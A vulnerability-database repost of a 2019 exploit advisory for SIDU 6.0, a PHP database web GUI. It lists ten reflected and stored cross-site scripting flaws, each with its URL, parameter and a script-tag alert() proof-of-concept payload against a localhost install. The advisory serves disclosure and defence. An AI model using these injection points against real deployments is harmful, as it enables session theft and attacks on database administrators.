Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SIDU 6.0 Cross Site Scripting

🗓️ 21 Jan 2019 00:00:00Reported by Ozer GokerType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 23 Views

SIDU 6.0 Database Web GUI | Cross-Site Scripting, Vulnerabilities, XSS detail

Code
`##################################################################################################################################  
# Exploit Title: SIDU 6.0 Database Web GUI | Cross-Site Scripting  
# Date: 17.01.2019  
# Exploit Author: Ozer Goker  
# Vendor Homepage: http://topnew.net/sidu  
# Software Link: http://downloads.sourceforge.net/sidu/sidu60.zip  
# Version: 6.0  
##################################################################################################################################  
  
Introduction  
  
SIDU is a database front-end tool GUI  
  
SIDU is a FREE database client working via web browser. SIDU is a simple,  
intuitive and easy database admin tool. Simply copy SIDU to your website  
and run without any setup. Written in PHP.  
  
Vulnerabilities: Cross-Site Scripting  
  
  
#################################################################################  
  
XSS details:  
  
#################################################################################  
  
XSS1 | Reflected  
  
URL  
http://localhost/sidu/db.php?id=1,,,,,%22%3E%3Cscript%3Ealert(1)%3C/script%3E  
  
METHOD  
Get  
  
PARAMETER  
id  
  
PAYLOAD  
"><script>alert(1)</script>  
  
#################################################################################  
  
XSS2 | Reflected  
  
URL  
http://localhost/sidu/tab.php?id=1,%,0,r,sqlite_master%22%3E%3Cscript%3Ealert(2)%3C/script%3E  
  
METHOD  
Get  
  
PARAMETER  
id  
  
PAYLOAD  
"><script>alert(2)</script>  
  
#################################################################################  
  
XSS3 | Reflected  
URL  
http://localhost/sidu/tab-new.php?id=2,mysql,,,,%22%3E%3Cscript%3Ealert(3)%3C/script%3E  
  
METHOD  
Get  
  
PARAMETER  
id  
  
PAYLOAD  
"><script>alert(3)</script>  
  
#################################################################################  
  
XSS4 | Reflected  
URL  
http://localhost/sidu/user.php?id=2&tab=2&db=%3Cscript%3Ealert(4)%3C/script%3E&[email protected]  
  
METHOD  
Get  
  
PARAMETER  
db  
  
PAYLOAD  
<script>alert(4)</script>  
  
#################################################################################  
  
XSS5 | Reflected  
URL  
http://localhost/sidu/user.php?id=2&tab=2&db=&userHost=%3Cscript%3Ealert(5)%3C/script%3E  
  
METHOD  
Get  
  
PARAMETER  
userHost  
  
PAYLOAD  
<script>alert(5)</script>  
  
#################################################################################  
  
XSS6 | Reflected  
URL  
http://localhost/sidu/temp.php?id=1,%3Cscript%3Ealert(6)%3C/script%3E  
  
METHOD  
Get  
  
PARAMETER  
id  
  
PAYLOAD  
<script>alert(6)</script>  
  
#################################################################################  
  
XSS7 | Reflected  
URL  
http://localhost/sidu/imp.php?id=2,test,0,r,&tab=%3Cscript%3Ealert(7)%3C/script%3E  
  
METHOD  
Get  
  
PARAMETER  
tab  
  
PAYLOAD  
<script>alert(7)</script>  
  
#################################################################################  
  
XSS8 | Stored - Create Database  
URL  
http://localhost/sidu/?id=2  
  
METHOD  
Get  
  
PAYLOAD  
<script>alert(8)</script>  
  
  
PoC  
Create Database at phpMyAdmin  
View Database on SIDU  
  
  
#################################################################################  
  
XSS9 | Stored - Create Table  
URL  
http://localhost/sidu/?id=2  
  
METHOD  
Get  
  
PAYLOAD  
<script>alert(9)</script>  
  
  
PoC  
Create Table at phpMyAdmin  
View Table on SIDU  
  
#################################################################################  
  
XSS10 | Reflected  
URL  
http://localhost/sidu/user.php?id=2&userHost=&user=test&host=%22%3E%3Cscript%3Ealert(10)%3C%2Fscript%3E&pass=&pass2=&cmd=Edit+User  
  
METHOD  
Get  
  
PARAMETER  
host  
  
PAYLOAD  
"><script>alert(10)</script>  
  
#################################################################################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Jan 2019 00:00Current
7.4High risk
Vulners AI Score7.4
sidudatabaseguicross-site scriptingvulnerabilitiesxssreflectedstoredcreatetablephp
23